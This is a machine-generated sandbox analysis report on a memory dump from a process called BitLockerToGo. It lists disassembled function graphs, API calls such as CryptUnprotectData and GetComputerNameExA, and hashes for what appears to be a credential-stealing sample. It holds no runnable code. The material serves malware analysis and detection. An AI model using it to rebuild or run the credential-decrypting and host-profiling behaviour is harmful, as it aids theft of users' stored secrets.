                                                                                                                                                                                                              • Instruction Fuzzy Hash: 90B105B4A007418FD728CF69D990A22BBF1FF9A30071985ADC4D68F7A2D739E805CB55
                                                                                                                                                                                                              Function 004165E4 Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 573COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 134 4165e4-4165e6 135 4165f0-4165f6 134->135 135->135 136 4165f8-416617 135->136 137 416619-41661c 136->137 138 41661e 136->138 137->138 139 41661f-416638 137->139 138->139 140 41663a-41663d 139->140 141 41663f 139->141 140->141 142 416640-41665a call 408030 140->142 141->142 145 416660-416667 142->145 146 416759-4167c1 call 43d1d0 CryptUnprotectData 142->146 148 416684-4166d0 call 41c460 * 2 145->148 152 4167e3-4167ef 146->152 153 4167d2-4167db call 408040 146->153 154 4168f6-41690f call 43d1d0 146->154 155 4167c8 146->155 156 4168ed-4168f3 call 408040 146->156 157 4167de 146->157 170 416670-41667e 148->170 171 4166d2-4166e9 call 41c460 148->171 161 4167f0-4167f9 152->161 153->157 182 418032-418045 call 4187b0 154->182 155->153 156->154 160 418197-4181ff 157->160 166 418200-41822a 160->166 161->161 167 4167fb-4167fe 161->167 166->166 172 41822c-418250 call 401da0 166->172 173 416800-416805 167->173 174 416807 167->174 170->146 170->148 171->170 183 4166eb-416714 171->183 172->182 184 418257-41828f 172->184 185 41804c-418051 172->185 177 41680a-41684f call 408030 173->177 174->177 190 416850-41687b 177->190 182->184 182->185 183->170 188 41671a-416734 call 41c460 183->188 189 418290-4182af 184->189 185->160 188->170 201 41673a-416754 188->201 189->189 193 4182b1-4182cf call 401dd0 189->193 190->190 194 41687d-416889 190->194 206 4183a0 193->206 207 418600-418604 193->207 208 4183b0-4183b9 call 408040 193->208 209 418533-418540 193->209 210 4183d4-4183eb call 401e10 193->210 211 418547-418555 193->211 212 4182d6-41830b 193->212 213 4183a6-4183ac 193->213 214 418576-4185d3 call 41ae50 193->214 215 4185dc-4185e9 call 408040 193->215 216 4183bc 193->216 217 41860e-41861d call 401f70 193->217 197 4168a1-4168b5 194->197 198 41688b-41688e 194->198 199 4168d1-4168e7 call 408b60 197->199 200 4168b7-4168bf 197->200 203 416890-41689f 198->203 199->156 204 4168c0-4168cf 200->204 201->170 203->197 203->203 204->199 204->204 206->213 207->217 208->216 209->207 209->208 209->211 209->214 209->215 209->216 236 418440 210->236 237 4183ed-4183f0 210->237 218 418571 211->218 219 418557-41855f 211->219 223 418310-418336 212->223 225 4183bd-4183cd call 401e00 213->225 214->215 215->207 216->225 218->214 229 418560-41856f 219->229 223->223 230 418338-418398 call 41ae50 223->230 225->207 225->208 225->209 225->210 225->211 225->214 225->215 225->216 225->217 229->218 229->229 230->217 242 418442-41844e 236->242 240 418409-418417 237->240 243 418400 240->243 244 418419-41841b 240->244 245 418460 242->245 246 418450-418455 242->246 247 418401-418407 243->247 244->243 248 41841d-418428 244->248 249 418467-418493 call 408030 call 40a7c0 245->249 246->249 247->240 247->242 248->243 250 41842a-418433 248->250 256 418495-418497 249->256 257 41849e-4184bb call 408030 249->257 250->247 252 418435-418438 250->252 252->247 256->257 260 4184e1-4184f3 257->260 261 4184bd-4184c2 257->261 263 418511-41851f call 43e920 260->263 264 4184f5-4184fa 260->264 262 4184d0-4184df 261->262 262->260 262->262 267 418524-41852c 263->267 265 418500-41850f 264->265 265->263 265->265 267->207 267->208 267->209 267->211 267->214 267->215 267->216
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: "A5l$7~,h$:v;h$;h2o$<n/~$_$q@0s
                                                                                                                                                                                                              • API String ID: 0-3780068648
                                                                                                                                                                                                              • Opcode ID: d6c6cc26523875e2cba40d58e468bd8b0425b41d77fe6d7c20336838abd28b8a
                                                                                                                                                                                                              • Instruction ID: 8e10c3f90e9eb06ccae32fa6bede3b07bbb00d148fa4935470ab29e0d6d4c69c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6c6cc26523875e2cba40d58e468bd8b0425b41d77fe6d7c20336838abd28b8a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A1226B29083019FC7249F24C8517ABB7E1EFD5314F15892EE4D9873A1EB38D981CB56
                                                                                                                                                                                                              Function 004227F6 Relevance: 14.0, Strings: 11, Instructions: 240COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 268 4227f6-4227fc 269 422805 268->269 270 4227fe-422803 268->270 271 422808-422826 call 408030 269->271 270->271 275 422852-42285b 271->275 276 422833-422839 call 408040 271->276 277 422850 271->277 278 42283c-422843 271->278 279 42282d 271->279 281 422868-42286c 275->281 282 42285d-422866 275->282 276->278 277->275 278->277 279->276 284 422873-4228af call 408030 281->284 282->284 287 4228b0-422920 284->287 287->287 288 422922-42292e 287->288 289 422930-422935 288->289 290 422951-422966 288->290 291 422940-42294f 289->291 292 422981-42298c call 43e920 290->292 293 422968-42296f 290->293 291->290 291->291 296 422991-422999 292->296 294 422970-42297f 293->294 294->292 294->294 297 4229b0-4229b7 296->297 298 4229a0-4229a7 296->298 299 422aa0-422b3e 296->299 300 4229c1 296->300 301 4229c7-422a67 296->301 302 422ce8-422cf7 call 408040 296->302 297->300 298->297 304 422b40-422b58 299->304 300->301 303 422a70-422a88 301->303 303->303 305 422a8a-422a9f call 4206d0 303->305 304->304 306 422b5a-422b6e call 4206d0 304->306 305->299 306->302
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: )!)$#)#)$&O7$().)$))0)$+)()$-).)$3)")$=).)$>)")$v.B
                                                                                                                                                                                                              • API String ID: 0-740882422
                                                                                                                                                                                                              • Opcode ID: 174ddcb0c1073a5b924e8725b956bb6790ea0586233098e12abde3eac4c50e14
                                                                                                                                                                                                              • Instruction ID: a5114850e952b8c59ef38c9257656ea7c20ff065b7e81d6989642306bb9eb3e9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 174ddcb0c1073a5b924e8725b956bb6790ea0586233098e12abde3eac4c50e14
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7281BCB49183109BD318DF5AE98122BBBF4FFE5304F545A2DF5D59B210D3B88902CB96
                                                                                                                                                                                                              Function 004085E0 Relevance: 7.7, APIs: 5, Instructions: 220threadCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 315 4085e0-4085f1 call 43b1c0 318 4085f7-4085fe call 434170 315->318 319 4088ae-4088b0 ExitProcess 315->319 322 408604-408628 GetCurrentProcessId GetCurrentThreadId 318->322 323 408897-40889e 318->323 324 40862a-40862c 322->324 325 40862e-4087e4 SHGetSpecialFolderPathW call 43a280 322->325 326 4088a0-4088a6 call 408040 323->326 327 4088a9 call 43b7e0 323->327 324->325 333 4087f0-40880c 325->333 326->327 327->319 334 408826-408842 GetForegroundWindow 333->334 335 40880e-408824 333->335 336 408873-40888b call 409b20 334->336 337 408844-408871 334->337 335->333 336->323 340 40888d call 40c920 336->340 337->336 342 408892 call 40b6d0 340->342 342->323
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00408604
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0040860E
                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408772
                                                                                                                                                                                                                • Part of subcall function 0043A280: RtlAllocateHeap.NTDLL(?,00000000,004087C1,?,004087C1,00001388), ref: 0043A290
                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0040883A
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004088B0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentProcess$AllocateExitFolderForegroundHeapPathSpecialThreadWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3634766228-0
                                                                                                                                                                                                              • Opcode ID: c79b31161eaab67f9f5e03b98ae6d72b444e092ca73f34092ca8b649c6f62c13
                                                                                                                                                                                                              • Instruction ID: 086e3edace53a1d5c1471e98d3e2b182ad2e88e46c3d2487443f827601e80181
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c79b31161eaab67f9f5e03b98ae6d72b444e092ca73f34092ca8b649c6f62c13
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA611A72A043044FD318EF799D5631BF6D6ABC9310F0AC53EB999EB391DE7898048789
                                                                                                                                                                                                              Function 004206D0 Relevance: 5.5, Strings: 4, Instructions: 546COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 344 4206d0-420715 call 43e780 347 420eb4-420ec4 344->347 348 42071b-420796 call 413d90 call 43a280 344->348 353 420798-42079b 348->353 354 4207f4-4207f8 353->354 355 42079d-4207f2 353->355 356 4207fa-420805 354->356 355->353 357 420807 356->357 358 42080c-420825 356->358 359 4208d0-4208d3 357->359 360 420830-420836 358->360 361 420827-42082b 358->361 365 4208d7-4208dc 359->365 366 4208d5 359->366 363 420843-4208b3 call 43b8a0 360->363 364 420838-420841 360->364 362 4208c1-4208c4 361->362 370 4208c6 362->370 371 4208c8-4208cb 362->371 374 4208b8-4208bd 363->374 364->362 367 4208e2-4208f2 365->367 368 420db8-420ded call 43a2a0 365->368 366->365 372 4208f4-420911 367->372 379 420def-420df2 368->379 370->359 371->356 375 420917-420930 372->375 376 420ad4-420ad8 372->376 374->362 378 420932-420935 375->378 380 420ada-420add 376->380 381 420937-420978 378->381 382 42097a-420998 call 420ed0 378->382 383 420df4-420e49 379->383 384 420e4b-420e4f 379->384 385 420ae5-420af6 call 43a280 380->385 386 420adf-420ae3 380->386 381->378 382->376 400 42099e-4209c7 382->400 383->379 388 420e51-420e57 384->388 397 420b08-420b0a 385->397 398 420af8-420b03 385->398 389 420b0c-420b0e 386->389 395 420e5b-420e6d 388->395 396 420e59 388->396 392 420d91-420d96 389->392 393 420b14-420b2f 389->393 404 420da2-420da6 392->404 405 420d98-420da0 392->405 407 420b31-420b34 393->407 402 420e71-420e77 395->402 403 420e6f 395->403 401 420eb2 396->401 397->389 406 420daa-420dae 398->406 408 4209c9-4209cc 400->408 401->347 409 420ea6-420ea9 402->409 410 420e79-420ea2 call 43b8a0 402->410 403->409 411 420da8 404->411 405->411 406->372 412 420db4-420db6 406->412 415 420b36-420b53 407->415 416 420b55-420b8f 407->416 417 420a02-420a21 call 420ed0 408->417 418 4209ce-420a00 408->418 413 420eab 409->413 414 420ead-420eb0 409->414 410->409 411->406 412->368 413->401 414->388 415->407 421 420b91-420b94 416->421 428 420a23-420a27 417->428 429 420a2c-420a4d 417->429 418->408 424 420b96-420beb 421->424 425 420bed-420bf3 421->425 424->421 427 420bf7-420c02 425->427 432 420c04 427->432 433 420c09-420c28 427->433 428->380 430 420a51-420ad2 call 408030 call 413a20 call 408040 429->430 431 420a4f 429->431 430->380 431->430 435 420ce8-420ceb 432->435 436 420c35-420c3f 433->436 437 420c2a-420c30 433->437 442 420cef-420d08 435->442 443 420ced 435->443 439 420c41-420c4a 436->439 440 420c4f-420cc9 call 43b8a0 436->440 438 420cd7-420cdc 437->438 446 420ce0-420ce3 438->446 447 420cde 438->447 439->438 449 420cce-420cd3 440->449 448 420d0a-420d0d 442->448 443->442 446->427 447->435 451 420d2e-420d34 448->451 452 420d0f-420d2c 448->452 449->438 453 420d62-420d65 451->453 454 420d36-420d3a 451->454 452->448 455 420d67-420d78 call 43a2a0 453->455 456 420d7a-420d80 453->456 458 420d3c-420d43 454->458 462 420d82-420d85 455->462 456->462 459 420d53-420d56 458->459 460 420d45-420d51 458->460 464 420d58 459->464 465 420d5e-420d60 459->465 460->458 462->392 467 420d87-420d8f 462->467 464->465 465->453 467->406
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeapInitializeThunk
                                                                                                                                                                                                              • String ID: !@$,$?~$j~
                                                                                                                                                                                                              • API String ID: 383220839-3420566057
                                                                                                                                                                                                              • Opcode ID: eb696b9a81ff76e8f50d2b965ee7f65dd9cb4f791b988b329618bb3c974c226e
                                                                                                                                                                                                              • Instruction ID: bb1f7b71dadf4569e958f358140e1f51ea4c1085977d452122ebedaab43f38d1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb696b9a81ff76e8f50d2b965ee7f65dd9cb4f791b988b329618bb3c974c226e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8222CF7161C3608BC3289F68D48136FBBE2AFC5310F94892EE5D587392E7799845CB4B
                                                                                                                                                                                                              Function 0042AF9F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 469 42af9f-42afcf 470 42afd0-42b028 469->470 470->470 471 42b02a-42b034 470->471 472 42b036-42b03f 471->472 473 42b04b-42b08c GetComputerNameExA 471->473 474 42b040-42b049 472->474 474->473 474->474
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042B06D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ComputerName
                                                                                                                                                                                                              • String ID: (5Xi
                                                                                                                                                                                                              • API String ID: 3545744682-544108822
                                                                                                                                                                                                              • Opcode ID: 4e2c1c84ac1f0c9119c2f895de2a90b27cd8b90ac0da9fce6f056a76107ce9ac
                                                                                                                                                                                                              • Instruction ID: ccaf43140a0f5cbc81473a73733068c6ded1121991b384f9f9fe1d119be33522
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e2c1c84ac1f0c9119c2f895de2a90b27cd8b90ac0da9fce6f056a76107ce9ac
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B11367561D6914ADB248F35C8583BBB7E5EBD6305F08452D80CAD7285CF784005C706
                                                                                                                                                                                                              Function 00409B20 Relevance: 2.6, Strings: 2, Instructions: 105COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 506 409b20-409b42 507 409b50-409bd0 506->507 507->507 508 409bd6-409c0f 507->508 509 409c10-409c29 508->509 509->509 510 409c2b-409c32 509->510 511 409c37-409c71 call 43b180 510->511
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: F0G0$u0H0
                                                                                                                                                                                                              • API String ID: 0-422099039
                                                                                                                                                                                                              • Opcode ID: b881b1e87e66fb038649869ed6fae0b7aa8f72ae8b1d30fcd66483a917feedd8
                                                                                                                                                                                                              • Instruction ID: 4e53f72a6730409e84e8950ff4302d58b30d8e3923eaf88ad368f669c711bca4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b881b1e87e66fb038649869ed6fae0b7aa8f72ae8b1d30fcd66483a917feedd8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1731E176A193409BD314DF74DC423A7B6E1ABCA304F04893DA591D7384E7B8C905C78A
                                                                                                                                                                                                              Function 0042AF24 Relevance: 1.8, APIs: 1, Instructions: 317COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 521 42af24-42af3f 522 42af40-42af66 521->522 522->522 523 42af68-42af6f 522->523 524 42af71-42af75 523->524 525 42af8b-42b86f 523->525 527 42af80-42af89 524->527 528 42b870-42b88a 525->528 527->525 527->527 528->528 529 42b88c-42b893 528->529 530 42b895-42b899 529->530 531 42b8ab-42b8b7 529->531 532 42b8a0-42b8a9 530->532 533 42b8d1-42b8f5 call 43d1d0 531->533 534 42b8b9-42b8bb 531->534 532->531 532->532 537 42b8fa-42b923 GetPhysicallyInstalledSystemMemory 533->537 535 42b8c0-42b8cd 534->535 535->535 538 42b8cf 535->538 539 42b930-42b951 537->539 538->533 539->539 540 42b953-42b989 call 41cfb0 539->540 543 42b990-42b9b8 540->543 543->543 544 42b9ba-42b9c1 543->544 545 42b9c3-42b9c7 544->545 546 42b9db-42b9e3 544->546 547 42b9d0-42b9d9 545->547 548 42b9e5-42b9e6 546->548 549 42b9fb-42ba05 546->549 547->546 547->547 550 42b9f0-42b9f9 548->550 551 42ba07-42ba0b 549->551 552 42ba1b-42ba6f 549->552 550->549 550->550 554 42ba10-42ba19 551->554 553 42ba70-42ba8a 552->553 553->553 555 42ba8c-42ba93 553->555 554->552 554->554 556 42ba95-42ba99 555->556 557 42baab-42bab8 555->557 558 42baa0-42baa9 556->558 559 42baba-42bac1 557->559 560 42badb-42bb5b 557->560 558->557 558->558 561 42bad0-42bad9 559->561 561->560 561->561
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042B905
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3960555810-0
                                                                                                                                                                                                              • Opcode ID: e2bc28477669437abcd8647a2a36832b370209f16c869da250ceeee04688e1e1
                                                                                                                                                                                                              • Instruction ID: 54cfc295aa3b4cc8fe636e1ca64ff8d61a008010a8d39a073fc19eee162a7ecf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e2bc28477669437abcd8647a2a36832b370209f16c869da250ceeee04688e1e1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8491A37050C3918AD729CF29D55076BBBE0EF97305F54085EE1CA9B3A2D33A8505CB5B
                                                                                                                                                                                                              Function 0042B4E1 Relevance: 1.8, APIs: 1, Instructions: 283COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 562 42b4e1-42b86f call 4315d0 call 408040 568 42b870-42b88a 562->568 568->568 569 42b88c-42b893 568->569 570 42b895-42b899 569->570 571 42b8ab-42b8b7 569->571 572 42b8a0-42b8a9 570->572 573 42b8d1-42b923 call 43d1d0 GetPhysicallyInstalledSystemMemory 571->573 574 42b8b9-42b8bb 571->574 572->571 572->572 579 42b930-42b951 573->579 575 42b8c0-42b8cd 574->575 575->575 578 42b8cf 575->578 578->573 579->579 580 42b953-42b989 call 41cfb0 579->580 583 42b990-42b9b8 580->583 583->583 584 42b9ba-42b9c1 583->584 585 42b9c3-42b9c7 584->585 586 42b9db-42b9e3 584->586 587 42b9d0-42b9d9 585->587 588 42b9e5-42b9e6 586->588 589 42b9fb-42ba05 586->589 587->586 587->587 590 42b9f0-42b9f9 588->590 591 42ba07-42ba0b 589->591 592 42ba1b-42ba6f 589->592 590->589 590->590 594 42ba10-42ba19 591->594 593 42ba70-42ba8a 592->593 593->593 595 42ba8c-42ba93 593->595 594->592 594->594 596 42ba95-42ba99 595->596 597 42baab-42bab8 595->597 598 42baa0-42baa9 596->598 599 42baba-42bac1 597->599 600 42badb-42bb5b 597->600 598->597 598->598 601 42bad0-42bad9 599->601 601->600 601->601
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042B905
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3960555810-0
                                                                                                                                                                                                              • Opcode ID: 46c556b050339564d6481be94656ffbdcda3a87a262d335a54f02c9bff1f8674
                                                                                                                                                                                                              • Instruction ID: 3f400867d2956580dd49c97be4e04613b7d9567a1d88427644f00e943b0b1864
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46c556b050339564d6481be94656ffbdcda3a87a262d335a54f02c9bff1f8674
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F81C17050C3918AD729CF29955076BBBE0EF9B304F54086EE1CA9B3A2D73A8505CB5B
                                                                                                                                                                                                              Function 0043E2B0 Relevance: 1.6, Strings: 1, Instructions: 316COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: R!S!
                                                                                                                                                                                                              • API String ID: 0-2754619947
                                                                                                                                                                                                              • Opcode ID: 52d76bbe8310a125ddcf00cd6d5e377379fdac9428efc12511a24353b55c4c7f
                                                                                                                                                                                                              • Instruction ID: 22768bf2a63544a0fa42277a88cb5a1c88805c41609c8fbde0d5921a7d891c69
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 52d76bbe8310a125ddcf00cd6d5e377379fdac9428efc12511a24353b55c4c7f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0981353260A3059BD7248F59D88076BB3E1EFD8308F15983DE889873E0EB75AC45C796
                                                                                                                                                                                                              Function 0043B8A0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LdrInitializeThunk.NTDLL(0043E8FA,005C003F,00000018,?,?,00000018,?,?,?), ref: 0043B8CE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                              Function 0043BFCD Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: D]+\
                                                                                                                                                                                                              • API String ID: 0-1174097187
                                                                                                                                                                                                              • Opcode ID: 24f6b2abcc05d60b50e09c5eaa46cb696ba0d2ef34d344d39bac536f1b5cf5a5
                                                                                                                                                                                                              • Instruction ID: 3389804a12a58ae7d12d741fd037ec205b2dabcb9ec0da44ff2f953e8839fc47
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 24f6b2abcc05d60b50e09c5eaa46cb696ba0d2ef34d344d39bac536f1b5cf5a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC2178756082108BC7189F48DCC07777362FB8E308F29653DDE926B362D7356816DB89
                                                                                                                                                                                                              Function 0043BD70 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 9.
                                                                                                                                                                                                              • API String ID: 0-3220845746
                                                                                                                                                                                                              • Opcode ID: 777c80cead33f09d81cbab6db243f49e875268cad53d40fe9d4007dab8e425f3
                                                                                                                                                                                                              • Instruction ID: b2fa3e6f3e6fb128fe1ebaea8aef44d6a6eb515cdfb7d3fc60a1dce0c6074baa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 777c80cead33f09d81cbab6db243f49e875268cad53d40fe9d4007dab8e425f3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1601F4746081109BD7288F14CC80B3673A0EB4A324F55632DFE54A73D1C3398C0197CD
                                                                                                                                                                                                              Function 00410698 Relevance: .8, Instructions: 759COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 2367075616557c33f7ffbe59e2a2c0268bee6d58cddcdd5f79e8d22a0b4a0a75
                                                                                                                                                                                                              • Instruction ID: c37e6478394e99d6c226e2b8045bd2617926b0e0af92e7ab6293a6faaa0b87d6
